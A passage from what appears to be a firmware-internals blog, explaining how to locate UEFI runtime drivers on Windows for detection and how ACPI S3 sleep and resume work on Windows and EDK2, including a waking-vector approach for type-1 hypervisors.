my ASUS laptop as an example, ResetSystem() is implemented in a runtime driver called SBRun. </div><div><br /></div><div>Those interfaces are called "runtime services" and defined for 14 services. One can find the C-representation of their definitions in <a href="https://github.com/tianocore/edk2/blob/f1567720b13a578ffa54716119f826df622babcd/MdePkg/Include/Uefi/UefiSpec.h#L1818">EDK2</a>.</div><div><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #6a9955;">///</span></div><div><span style="color: #6a9955;">/// EFI Runtime Services Table.</span></div><div><span style="color: #6a9955;">///</span></div><div><span style="color: #569cd6;">typedef</span> <span style="color: #569cd6;">struct</span> {</div><div><span style="color: #6a9955;"> ///</span></div><div><span style="color: #6a9955;"> /// The table header for the EFI Runtime Services Table.</span></div><div><span style="color: #6a9955;"> ///</span></div><div> <span style="color: #4ec9b0;">EFI_TABLE_HEADER</span> <span style="color: #9cdcfe;">Hdr</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Time Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_TIME</span> <span style="color: #9cdcfe;">GetTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_TIME</span> <span style="color: #9cdcfe;">SetTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_GET_WAKEUP_TIME</span> <span style="color: #9cdcfe;">GetWakeupTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_WAKEUP_TIME</span> <span style="color: #9cdcfe;">SetWakeupTime</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Virtual Memory Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_SET_VIRTUAL_ADDRESS_MAP</span> <span style="color: #9cdcfe;">SetVirtualAddressMap</span>;</div><div> <span style="color: #4ec9b0;">EFI_CONVERT_POINTER</span> <span style="color: #9cdcfe;">ConvertPointer</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Variable Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_VARIABLE</span> <span style="color: #9cdcfe;">GetVariable</span>;</div><div> <span style="color: #4ec9b0;">EFI_GET_NEXT_VARIABLE_NAME</span> <span style="color: #9cdcfe;">GetNextVariableName</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_VARIABLE</span> <span style="color: #9cdcfe;">SetVariable</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Miscellaneous Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_NEXT_HIGH_MONO_COUNT</span> <span style="color: #9cdcfe;">GetNextHighMonotonicCount</span>;</div><div> <span style="color: #4ec9b0;">EFI_RESET_SYSTEM</span> <span style="color: #9cdcfe;">ResetSystem</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // UEFI 2.0 Capsule Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_UPDATE_CAPSULE</span> <span style="color: #9cdcfe;">UpdateCapsule</span>;</div><div> <span style="color: #4ec9b0;">EFI_QUERY_CAPSULE_CAPABILITIES</span> <span style="color: #9cdcfe;">QueryCapsuleCapabilities</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Miscellaneous UEFI 2.0 Service</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_QUERY_VARIABLE_INFO</span> <span style="color: #9cdcfe;">QueryVariableInfo</span>;</div><div>} <span style="color: #4ec9b0;">EFI_RUNTIME_SERVICES</span>;</div></div></div><div><br /></div><h2 style="text-align: left;">Why we care? </h2><div>Runtime drivers have some interesting characteristics:</div><div><ul style="text-align: left;"><li>They start before the OS is loaded and can influence the boot process</li><li>They run with the ring-0 privilege</li><li>They are called during normal OS execution through the runtime services</li><li>They are not listed by any widely known monitoring tools or debuggers (unlike device drivers) on Windows</li><li>They can be developed by anyone and be loaded as long as Secure Boot is disabled</li><li>They may not exist as files in storage that is accessible from OS </li></ul>Because of the lack of visibility into them and access to files, diagnosing issues with them can be more challenging than the issues with OS-based kernel modules. For example, to reverse engineer runtime driver code, you first have to find the runtime drivers in memory and extract them to a file, instead of grabbing a file on the disk.</div><div><br /></div><div>The other reason is that runtime drivers have gained popularity in a reverse engineering community and are used more and more widely in a way that breaks the standard OS/system integrity. For example, the owner of the system may install a 3rd party runtime driver that overrides the runtime services provided by OEM firmware, to have a "backdoor" for reverse engineering. <a href="https://github.com/Mattiwatti/EfiGuard">EfiGuard</a> and <a href="https://github.com/SamuelTulach/efi-memory">efi-memory</a> are examples of those. While that is the owner's very intention, some software may still want to detect this and be aware of the fact that system integrity might be tampered. </div><div><br /></div><h2 style="text-align: left;">How can we find runtime drivers on Windows?</h2><div>There is no documented interface to locate any runtime drivers in the Windows kernel, unfortunately. However, there are few implementation details that can be abused for it, for example,</div><div><ul style="text-align: left;"><li>The addresses of some runtime services are stored in HalEfiRuntimeServicesBlock</li><li>There is an EFI_RUNTIME_SERVICES global variable, which contains pointers to the runtime services as seen above, has <a href="https://github.com/tianocore/edk2/blob/edk2-stable202011/MdePkg/Include/Uefi/UefiSpec.h#L1814">a distinctive RUNTSERV signature</a>, and is memory resident</li><li>Runtime drivers are also memory resident, mapped in a certain contiguous physical and virtual memory range, and have the DOS header at 4KB aligned addresses</li><li>Physical memory addresses backing runtime drivers are outside the ranges of Windows manages</li></ul><div>Based on those facts, one may scan the DOS header in physical or virtual memory and attempt to find all runtime drivers. </div><div><br /></div><div>The other limited (details later) but arguably easier and safer way is to refer to HalEfiRuntimeServicesBlock. HalEfiRuntimeServicesBlock is a Windows defined structure made up of copies of a handful of runtime service addresses [<a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">ref</a>], as shown below. </div></div><div><br /></div><div><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #569cd6;">typedef</span> <span style="color: #569cd6;">struct</span> <span style="color: #4ec9b0;">_HAL_RUNTIME_SERVICES_BLOCK</span></div><div>{</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetTime</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">SetTime</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">ResetSystem</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetVariable</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetNextVariableName</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">SetVariable</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">UpdateCapsule</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">QueryCapsuleCapabilities</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">QueryVariableInfo</span>;</div><div>} <span style="color: #4ec9b0;">HAL_RUNTIME_SERVICES_BLOCK</span>;</div></div></div><div><br /></div><div>Windows initializes this structure on its startup and uses it to invoke runtime services (as opposed to directly using the EFI_RUNTIME_SERVICES structure). By locating HalEfiRuntimeServicesBlock, one can find runtime services' addresses and runtime drivers implementing them. </div><div><br /></div><h2 style="text-align: left;">PoC and challenges </h2><div>I authored the tool implementing this idea, named <a href="https://github.com/tandasat/kraft_dinner">kraft_dinner</a>. Greater details can be found in source code, and here are some notable discoveries with this approach.</div><div><ul style="text-align: left;"><li>HalEfiRuntimeServicesBlock can be found with HalQuerySystemInformation() up until only 19H2. One has to get creative for newer versions.</li><li>The physical memory address range backing runtime drivers is not known to Windows and not reported by MmGetPhysicalMemoryRanges(). This can be used to test a probable runtime driver address. </li><li>MmCopyMemory() never succeeds in reading memory that backs runtime drivers, regardless of whether virtual or physical memory is specified. This makes implementing a safe search operation harder.</li></ul><h2 style="text-align: left;">Limitations</h2></div><div>While the HalEfiRuntimeServicesBlock approach works reasonably well, it has some fundamental limitations.</div><div><br /></div><div>Firstly, runtime drivers that do not implement runtime services are not found. Such runtime drivers do not have any formally defined way to directly influence Windows and system integrity, but may still hook (patch) other code to implement backdoor instead. <a href="https://github.com/btbd/umap">umap</a> and <a href="https://githacks.org/_xeroxz/voyager">voyager</a> are examples of such hacking drivers. A memory scanning-based approach would address this issue. </div><div><br /></div><div>Secondly, runtime drivers can hide from this approach easily by writing trampoline code at the beginning of the original runtime service, instead of replacing the pointer in EFI_RUNTIME_SERVICES, or by nullifying the PE header. Those may be mitigated with more intelligent analysis and dumping, but is an easy countermeasure against scanning. </div><div><br /></div><div>Thirdly, as a general challenge with memory analysis, classifying memory dumped files is not straightforward. Because memory contents can slightly vary between boots because of relocation (code patches), hash values change each time. Fuzzy hashing such as <a href="https://ssdeep-project.github.io/ssdeep/index.html">ssdeep</a> is required to classify dump files and build a useful database. Also, a dump file does not contain driver's name and GUID as found in the actual firmware.</div><div><br /></div><div>Finally, this is Windows-specific and hacky. It depends heavily on Windows implementation details which may break soon. While PoC worked fined with multiple devices, I would not be comfortable deploying this logic for millions of systems. </div><div><br /></div><h2 style="text-align: left;">So why did I do this?</h2><div>I encountered a bug in one of OEM runtime drivers and thought I would tool something quick, but in Rust :) </div><div><br /></div><h2 style="text-align: left;">References</h2><div><ul style="text-align: left;"><li><a href="https://github.com/tianocore/edk2">EDK2</a></li><li><a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">Getting Physical with USB Type-C, Windows 10 RAM Forensics and UEFI Attacks</a></li><li><a href="https://github.com/tandasat/kraft_dinner">kraft_dinner</a></li><li><a href="https://github.com/Mattiwatti/EfiGuard">EfiGuard</a> </li><li><a href="https://github.com/SamuelTulach/efi-memory">efi-memory</a></li><li><a href="https://github.com/btbd/umap">umap</a></li><li><a href="https://githacks.org/_xeroxz/voyager">voyager</a></li><li><a href="https://ssdeep-project.github.io/ssdeep/index.html">ssdeep</a></li></ul></div><p></p>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-79887785807042221992020-11-16T07:20:00.008-08:002020-11-25T19:36:13.191-08:00S3 Sleep, Resume and Handling Them with Type-1 Hypervisor This post explains how the system enters and resumes from S3 (Sleep) on a modern x86-64 system, by reviewing specifications and the implementation of Windows as an example. This post also outlines challenges with S3 for type-1 hypervisors and how to work around it.<div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyW2wq5HppBPnb86dcfewe8R5lOXAjYVZ5Ekh2wIkt-fqIQmDQg41YNvK25HNPP65L7SBnhNqZvnS6rt79vhIPZniSkE6_g0kzARDlrlf37S1XJFHGJ2WjCTEJuzKplA3ZNWeFKDpt2Xw/s2016/IMG_6749.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1512" data-original-width="2016" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyW2wq5HppBPnb86dcfewe8R5lOXAjYVZ5Ekh2wIkt-fqIQmDQg41YNvK25HNPP65L7SBnhNqZvnS6rt79vhIPZniSkE6_g0kzARDlrlf37S1XJFHGJ2WjCTEJuzKplA3ZNWeFKDpt2Xw/s320/IMG_6749.jpg" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">TeaTea in the S3 state<br /><br /></td></tr></tbody></table><h2 style="text-align: left;">Why S3 is Interesting</h2><div>On normal system startup, UEFI-based system firmware goes through four execution phases before starting the OS. Those phases include Driver eXecution Environment (DXE), Boot Device Selection (BDS), and <span style="white-space: pre;">Transient System Load (TSL)</span> where system configurations are set and 3rd party firmware modules may be executed. The S3 resume boot path, on the other hand, those phases are skipped for faster start-up. </div><div><div><br /></div>This has significant security implications because the S3 resume boot path needs to reapply the same security configurations as they are made during the normal boot path, using entirely different code. Failure of doing it securely leads to vulnerabilities, for example, unauthorized modification of a system firmware image if a firmware write-protection bit is not reapplied during resume. </div><div><br /></div><div>Also, for the type-1 hypervisor that is loaded during the <span style="white-space: pre;">TSL</span> phase, lack of the that phase means it is unable to get loaded on resume. Since the processors were shutdown on S3, processor-based virtualization features such as Intel VT-x stop working after resume even though the hypervisor module remains mapped in memory. This needs to be handled. </div><div><br /></div><h2 style="text-align: left;">High-Level Flow</h2>Before diving into details, let us review a high-level flow of S3 sleep and resume. The followings are the highlights.</div><div><ol style="text-align: left;"><li>Setting certain bits in the registers called Power Management (PM) 1 Control registers, or PM1a_CNT_BLK / PM1b_CNT_BLK puts the system into the S3 state.</li><li>During the next system start-up, system firmware detects that shutdown was because of S3 and executes the S3 resume boot path, instead of the normal boot path. </li><li>System firmware executes a collection of commands, called boot scripts, and code pointed by the Firmware Waking Vector in the ACPI table. This latter is called an OS waking vector and set up by the OS prior to entering S3. </li><li>The waking vector resumes execution of the OS.</li></ol><div><div><h3 style="text-align: left;">Entering S3</h3></div></div><div>The platform enters S3 when software sets 1 to the SLP_EN bits and 5 (0b101) to the SLP_TYP bits in the PM1 control registers. Looking at the ACPI specification, it states that settings the SLP_EN triggers state transition. </div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUTMcKpM6tEJ9TZEfKTKzomVBAy9BQBT8L0vwnDQLCNl08Me7Y8u-IbLRypbi8zaHNCs2WO1N7ECpuBPiFBmVtSQB0GBVRAtBLR_XU_rytyRXiDPleDGSmp-zGfFUv-maiJlYXXPaTeY/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="619" data-original-width="2171" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUTMcKpM6tEJ9TZEfKTKzomVBAy9BQBT8L0vwnDQLCNl08Me7Y8u-IbLRypbi8zaHNCs2WO1N7ECpuBPiFBmVtSQB0GBVRAtBLR_XU_rytyRXiDPleDGSmp-zGfFUv-maiJlYXXPaTeY/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Table 4.13: PM1 Control Registers Fixed Hardware Feature Control, from the ACPI spec</span></td></tr></tbody></table>The explanation of the SLP_TYP bits in the table is not crystal clear, but it becomes more obvious with the specification of the Intel platform. The below is an excerpt from the table under 4.2.2 Power Management 1 Control (PM1_CNT) in one of the hardware models that implement ACPI.</div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkZxbT_jzEvw2hPnNDYmJqZi1BCGlvK4rU31Lazyk1oZDn2wHmkfntuLMTk2MMj0rU5-PY2H1PkPoIuG7zy4OU7rBAZQpYBTakmjuXZ4MNExQtqeinAfotaXAiTQ3hxY45g5eEHnb907g/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="441" data-original-width="1834" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkZxbT_jzEvw2hPnNDYmJqZi1BCGlvK4rU31Lazyk1oZDn2wHmkfntuLMTk2MMj0rU5-PY2H1PkPoIuG7zy4OU7rBAZQpYBTakmjuXZ4MNExQtqeinAfotaXAiTQ3hxY45g5eEHnb907g/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;"> From Intel 495 Series Chipset Family On-Package Platform Controller Hub volume 2</span></td></tr></tbody></table><br /><div>Then, where are those registers? The ACPI does not define it but does define the way to locate them. Under 4.8.3 PM1 Control Registers, it states that</div><div><blockquote>Each register block has a unique 32-bit pointer in the Fixed ACPI Table (FADT) to allow the PM1 event bits to be partitioned between two chips.</blockquote></div><div>The below are excerpts of the FADT format, which contains multiple fields indicating where the registers are. </div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SCUkQCkDndYKoxTK2joWBiY_YyG_2ed8KNk04KncAgP9bJvztrMQ999L3YvvBfj0qG_g_aYmIRr0ouY9Hku8ZaYjUK2uFxQTcvvwLamVUzWxjBPutaEbtI-MiLW-5IFfIrBTv_jPv_4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="404" data-original-width="2189" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SCUkQCkDndYKoxTK2joWBiY_YyG_2ed8KNk04KncAgP9bJvztrMQ999L3YvvBfj0qG_g_aYmIRr0ouY9Hku8ZaYjUK2uFxQTcvvwLamVUzWxjBPutaEbtI-MiLW-5IFfIrBTv_jPv_4/" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">...</div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj5Cg3NaA1AoM9WYneM0Hxl4SlgsgWvwKFw1EBc0C5vSyaZ-mBXCWdOOWxrXdyY18VUMo0TBVv6jTkeXdgzBa3tXms7u8iXQvL_Jopd8Y4bkVZR37ZhB5S2z9r-h7oZcotS3QIjAWrv4M/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="467" data-original-width="2218" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj5Cg3NaA1AoM9WYneM0Hxl4SlgsgWvwKFw1EBc0C5vSyaZ-mBXCWdOOWxrXdyY18VUMo0TBVv6jTkeXdgzBa3tXms7u8iXQvL_Jopd8Y4bkVZR37ZhB5S2z9r-h7oZcotS3QIjAWrv4M/" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">...</div><div class="separator" style="clear: both; text-align: center;"><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6g92ggWEyEyodIyo-H0ikOJQO9d0JkRCt8OOv7AirGDKIHBL6GiJMY-14mB5BIQCs37Hegqom5HAJCnnfp0WcpJ8ClfUUvkkndspDzgPRL2fk8xNA252eaxff-iXh6HdRh_2ILB6pqs/"><img alt="" data-original-height="408" data-original-width="2184" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6g92ggWEyEyodIyo-H0ikOJQO9d0JkRCt8OOv7AirGDKIHBL6GiJMY-14mB5BIQCs37Hegqom5HAJCnnfp0WcpJ8ClfUUvkkndspDzgPRL2fk8xNA252eaxff-iXh6HdRh_2ILB6pqs/" width="320" /></a></div></div></div><div>Depending on the implementation of ACPI, some fields may be unused. On my system, the SLEEP_CONTROL_REG field in the table tells that the register is located at IO-port 0x1804. </div></div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9ve454sxg5y8ugSaSAznUSCG7KjxMjRlqqwRVaWiYniNZ4iAiETl8SYrbSqaxbOsVbM1z1h7jUvhUXlULNosvuonxoOGCDMajSf6dB3EdSr_nlKQlfX1pjv1JPF126sDLsft_Z1IH7k/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="1174" data-original-width="1920" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9ve454sxg5y8ugSaSAznUSCG7KjxMjRlqqwRVaWiYniNZ4iAiETl8SYrbSqaxbOsVbM1z1h7jUvhUXlULNosvuonxoOGCDMajSf6dB3EdSr_nlKQlfX1pjv1JPF126sDLsft_Z1IH7k/w458-h280/image.png" width="458" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RWEverything parsing the FACP table on Windows<br /></td></tr></tbody></table><br /></div><div>So far, we learned that: </div><div><ul style="text-align: left;"><li>the system enters S3 state when software sets SLP_EN and SLP_TYP bits in the PM1 control register.</li><li>the PM1 control register can be located through the FADT ACPI table. </li></ul></div><div>Note that the ACPI table itself can be easily located with platform specific ways, such as /sys/firmware/acpi on Linux, GetSystemFirmwareTable() on Windows, or EfiLocateFirstAcpiTable() on UEFI.</div><div><br /></div><h3 style="text-align: left;">Resuming from S3</h3><div><div>On system start-up, system firmware executes the same initialization path as the normal boot path, and then, diverges when it detects that the previous shutdown was entering S3. This resume-specific path is called the S3 resume boot path and well explained in the UEFI Platform Initialization (PI) specification. </div><div><br /></div><div>In a nutshell, the S3 resume boot path executes the boot scripts to re-initialize the platform, instead of executing the last three boot phases: DXE, BDS and TSL. The boot scripts are saved in non-volatile storage and replicate platform configuration made during normal boot. The below illustration from the spec highlights differences between normal and S3 resume boot paths, as well as how boot scripts are saved and consumed.</div></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglCXNh1yOcfRud0f6TmTeampzkgJK1WGemw_IwEl2_Rwar3_KJE33IaQ2vGaEJQXcwb66UYM3kdPxluT4CULbBaod4rCjoYERY_jeEjbNmDqdBnql0P5PxsRMAITItbcZjc2Oiww5WH0I/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="941" data-original-width="1809" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglCXNh1yOcfRud0f6TmTeampzkgJK1WGemw_IwEl2_Rwar3_KJE33IaQ2vGaEJQXcwb66UYM3kdPxluT4CULbBaod4rCjoYERY_jeEjbNmDqdBnql0P5PxsRMAITItbcZjc2Oiww5WH0I/w543-h282/image.png" width="543" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Normal and S3 resume boot paths, from the PI spec<br /></td></tr></tbody></table>As illustrated, after boot scripts are executed, an OS waking vector is executed to resume execution of the OS on the S3 resume boot path. The OS waking vector is the very first OS-specific code (the code that is developed by the OS vendor, and not part of system firmware). This is typically 16bit real-mode code that changes the processor mode to the long mode, resets registers to the same values as what they had before the system entered S3, and lets the OS execute further restoration code to fully resume the system. The OS sets up this OS waking vector right before entering S3. </div><div><br /></div><div>How the OS sets up the OS waking vector and how system firmware finds its location? Again, ACPI defines the way. </div><div><br /></div><div>The Firmware ACPI Control Structure (FACS) table defines a field called Firmware Waking Vector. This is where the OS should write the address of the OS waking vector to it, and system firmware should read it to locate and execute the OS waking vector. </div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ZJdeMIDg6sG0hJ3rVUTOHOGClL8-fD5gcSxOO1GG4QO_VvbFwsBAY5-PcmeK_ABasSsjIivVN7hHHVizqGzsiCcE_gN5Xlhe4NakFzBMSOLbX4ZiZRVLCQ7Cyi6ZD4VbmG9rVgUI_w8/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="405" data-original-width="2267" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ZJdeMIDg6sG0hJ3rVUTOHOGClL8-fD5gcSxOO1GG4QO_VvbFwsBAY5-PcmeK_ABasSsjIivVN7hHHVizqGzsiCcE_gN5Xlhe4NakFzBMSOLbX4ZiZRVLCQ7Cyi6ZD4VbmG9rVgUI_w8/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Firmware Waking Vector in FACS, from the ACPI spec<br /></td></tr></tbody></table><br />To summarize the flow in the chronological order:</div><div><ol style="text-align: left;"><li>OS writes an address of the OS waking vector (ie, bootstrap code) to the Firmware Waking Vector field of the FACS table before entering S3.</li><li>System firmware reads the field to know the address of the OS waking vector and transfers execution to the address during the S3 resume boot path.</li><li>The OS waking vector eventually resumes system states using configurations kept in memory.</li></ol><div><br /></div></div><h2 style="text-align: left;">Implementation on Windows and EDK2</h2><div>Let us look into how the above we reviewed are implemented on Windows (build 18362) and EDK2. </div><div>EDK2 is a reference implementation of UEFI, the system firmware specification, and very commonly used as a base of commercial system firmware. </div><div><br /></div><h3 style="text-align: left;">Entering S3</h3><div>On Windows, HaliAcpiSleep() is the main function that implements S3 handling and is called on all processors when a user requests entering S3. It roughly does the following in the order. </div><div><ol style="text-align: left;"><li>Boot strap processor (BSP) sets up the OS waking vector with HalpSetupRealModeResume().<br /><div style="background-color: #1e1e1e; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><span style="color: #d4d4d4;">*HalpWakeVector = HalpLowStubPhysicalAddress;
</span><span style="color: #6aa84f;">//
// Where HalpWakeVector is the address of the
// Firmware Waking Vector field in the FACS table,
// initialized at HaliInitPowerManagement()
//</span></div></li><li>BSP waits for all APs to complete saving their states.<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>InterlockedAdd(&HalpFlushBarrier, 1);</div><div>while (HalpFlushBarrier != ProcessorCount);</div></div></li><li>Application processors (APs) save their registers with HalpSaveProcessorState().</li><li>APs enter the loop that does not exit in a successful path in HalpFlushAndWait().<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>InterlockedIncrement(&HalpFlushBarrier);</div><div>while (HalpFlushBarrier);</div></div></li><li>BSP writes to the PM1 control register(s) to set the following values with HalpAcpiPmRegisterWrite().</li><ul><li>SLP_TYP = 5 (S3)</li><li>SLP_EN = 1 </li></ul></ol><div>This puts the system into the S3 state. Let us look into the resume path.</div><div><br /></div><h3 style="text-align: left;">Resuming from S3</h3><div><ol style="text-align: left;"><li>On the EDK2, system firmware, side, the S3 resume boot specific execution flow looks roughly like this.<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>...</div><div> -> DxeLoadCore()</div><div> -> S3RestoreConfig2()</div><div> -> S3ResumeExecuteBootScript()</div><div> -> S3BootScriptExecutorEntryFunction()</div></div></li><li><div>S3BootScriptExecutorEntryFunction() executes the boot script and jumps to the OS waking vector as indicated by <span style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; white-space: pre;">Facs->FirmwareWakingVector</span> at the end.</div></li><li><div>The OS waking vector is a copy of HalpRMStub. This eventually brings the execution of BSP to the right after HalpSetupRealModeResume() with RAX=1, as if it returned from the function. </div></li><li>BSP wakes up other APs by sending INIT-SIPI-SIPI.<div style="background-color: #1e1e1e; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #6aa84f;">//
// This wakes up all APs with HalStartNextProcessor() calls
//</span></div><div><span style="color: #d4d4d4;">HalpAcpiPostSleep(...); </span><span style="color: #6aa84f;"> </span></div></div></li><li><div>The INIT-SIPI-SIPI brings APs to the right after HalpSaveProcessorState() with RAX=1, as if it returned from the function. For more details on how INIT-SIPI-SIPI starts up APs, please read <a href="https://standa-note.blogspot.com/2020/03/initializing-application-processors-on.html" target="_blank">the previous post</a>. </div></li><li><div>All BSP and APs call HalpPostSleepMP() to restore other platform states, then return from HaliAcpiSleep(), continuing OS execution as usual</div></li></ol></div></div><div><div>If you are interested in how exactly the OS waking vector is set up and resumes the system states, I suggest reversing the HaliAcpiSleep() on your own. The way it factors code to keep the flow as straightforward as possible is a masterpiece. </div><div><br /></div><div>Note that on VMware, step 1 of the pre-S3 and step 1-3 of the post-S3 steps are skipped. Windows on VMware dose not need them either as the VMware hypervisor directly restores system states, instead of going through the full S3 resume boot path. </div></div><div><br /></div><h2 style="text-align: left;">Handling S3 with Type-1 Hypervisor</h2><div>As mentioned previously, S3 is a challenge for the type1 hypervisor that is loaded during the TSL phase because,</div><div><ul style="text-align: left;"><li>On resume, the TSL phase is skipped and no opportunity to get called.</li><li>On resume, virtualization is disabled and needs to be enabled.</li><li>It cannot add its boot script to trigger reinitialization, because it is locked at the TSL phase already. </li></ul><div>One may employ the guest support module that subscribes the resume event and notifies the hypervisor to trigger reinitialization, but it is neither secure, portable, nor reliable. Another quick-and-dirty way is to disable S3 by altering the ACPI table, which has an obvious user experience issue. </div></div><div><br /></div><div>The much superior way is to hook the OS waking vector. This works as following:</div><div><ol style="text-align: left;"><li>The hypervisor intercepts IO access to the PM1 control register(s)</li><li>When the guest attempts to write to the register to enter sleep, the hypervisor </li><ol><li>overwrites contents of the Firmware Waking Vector field with its own waking vector address, and</li><li>writes to the register and lets the system enter S3</li></ol><li>When the system wakes up, hypervisor's waking vector is executed, and it</li><ol><li>reenables virtualization (with VMXON for example) </li><li>sets up the guest state to emulate execution of guest's waking vector (ie, guest's RIP is set to the guest waking vector)</li><li>launches the guest (with VMLAUNCH for example)</li></ol></ol><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 